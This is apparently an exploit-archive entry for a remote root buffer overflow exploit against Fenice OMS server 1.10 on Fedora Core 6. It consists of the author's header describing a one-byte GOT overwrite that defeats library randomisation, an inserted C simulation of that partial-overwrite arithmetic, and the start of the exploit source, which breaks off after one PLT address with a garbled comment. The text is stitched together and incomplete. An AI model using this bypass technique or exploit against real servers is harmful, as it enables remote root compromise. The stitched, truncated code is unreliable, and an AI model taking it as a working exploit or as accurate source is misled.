
# Title : Fenice OMS server 1.10 Remote Buffer Overflow Exploit (exec-shield)
# Published : 2007-04-29
# Author : Xpl017Elz


/*
**
** Fedora Core 6 (exec-shield) based
** Fenice OMS server (fenice-1.10.tar.gz) remote root exploit
** by Xpl017Elz
**
** Advanced exploitation in exec-shield (Fedora Core case study)
** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt
**
** Reference: http://www.securityfocus.com/bid/17678
** vendor: http://streaming.polito.it/legacy_server
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.inetcop.org
**
*/
/*
** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
**
** This is a very common standalone daemon remote buffer overflow vulnerability.
** I used the same method as in my proftpd exploit again to avoid the randomised library mapping.
** And I'm planning to publish it in English.
**
** http://x82.inetcop.org/h0me/papers/FC_exploit/FC_oneshot_exploit.txt
**
** Kaveh Razavi's exploit uses about 750Kb and mine uses 115Kb more.
**
*/
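The header above says the exploit sidesteps the randomised library mapping by rewriting a single byte of a GOT entry. The block below is an added illustration of the arithmetic behind that kind of partial overwrite: it is not code from this exploit or from the author's paper, and the base address, the randomisation range (8 random bits at page granularity), the offsets and the guessed value are constructed assumptions, not Fedora Core 6, glibc or Fenice values. It shows why a one-byte write works for every base when the two targets share everything above the low byte, and why widening the write to two bytes pulls randomised bits into the write and turns it into a 1-in-16 guess.

```c
#include <stdint.h>
#include <stdio.h>

/* Assumed layout for this illustration (not taken from the exploit):
 * - 32-bit process; the library is mapped at 0xb7000000 | (r << 12), r in 0..255,
 *   i.e. a page-aligned base with 8 bits of randomness in bits 12..19.
 * - The attacked GOT entry has already been resolved to base + off_a.
 * - The attacker wants it to hold base + off_b without knowing r. */
#define BASE_FIXED   0xb7000000u
#define RAND_SHIFT   12
#define RAND_VALUES  256

/* Keep the high (4 - nbytes) bytes of `got`, replace the low nbytes with those of `value`. */
static uint32_t partial_overwrite(uint32_t got, uint32_t value, int nbytes)
{
    if (nbytes >= 4) return value;
    uint32_t mask = (1u << (nbytes * 8)) - 1u;
    return (got & ~mask) | (value & mask);
}

/* With a page-aligned base the low byte of base + off is just the low byte of off and
 * never carries, so a single-byte overwrite retargets off_a -> off_b for every base
 * exactly when the two offsets agree on everything above their low byte. */
static int one_byte_is_deterministic(uint32_t off_a, uint32_t off_b)
{
    return (off_a >> 8) == (off_b >> 8);
}

/* Exhaustively try every randomised base. The attacker guesses the random bits as
 * guess_r and writes the low nbytes of (guessed base + off_b) over the GOT entry.
 * Returns how many of the RAND_VALUES bases end up with the entry at base + off_b. */
static int count_successful_bases(uint32_t off_a, uint32_t off_b, int nbytes, unsigned guess_r)
{
    int hits = 0;
    uint32_t guessed_base = BASE_FIXED | ((guess_r & (RAND_VALUES - 1)) << RAND_SHIFT);
    for (unsigned r = 0; r < RAND_VALUES; r++) {
        uint32_t base  = BASE_FIXED | (r << RAND_SHIFT);
        uint32_t got   = base + off_a;   /* resolved entry before the attack */
        uint32_t want  = base + off_b;   /* where the next call through the PLT should land */
        uint32_t after = partial_overwrite(got, guessed_base + off_b, nbytes);
        if (after == want) hits++;
    }
    return hits;
}

int main(void)
{
    /* Constructed offsets: near_b sits 0x30 bytes past near_a, inside the same 256-byte window. */
    uint32_t near_a = 0x000b1c10u, near_b = 0x000b1c40u;
    /* Constructed offset in a different 256-byte window of the same library. */
    uint32_t far_b = 0x000b2a40u;

    printf("1-byte write, same window:  %d/%d bases (deterministic=%d)\n",
           count_successful_bases(near_a, near_b, 1, 0), RAND_VALUES,
           one_byte_is_deterministic(near_a, near_b));
    printf("1-byte write, other window: %d/%d bases\n",
           count_successful_bases(near_a, far_b, 1, 0), RAND_VALUES);
    printf("2-byte write, other window, guessing r=0: %d/%d bases "
           "(4 random bits fall inside the write)\n",
           count_successful_bases(near_a, far_b, 2, 0), RAND_VALUES);
    return 0;
}
```

The exhaustive loop stands in for what a real attacker only gets by repeated attempts: with the two-byte write, only the bases whose randomised bits match the guess survive, which is why widening a partial overwrite costs one extra guess per randomised bit it covers, and why choosing a target whose offset keeps the difference inside the deterministic low bytes is the whole game.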

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>


#define UNAME_PLT 0x8048e9c // <uname@plt> // [comment garbled in extraction; legible fragments: "random ... mapping ...", "(execle()>>16)&0xff", "GOT 1byte ..."]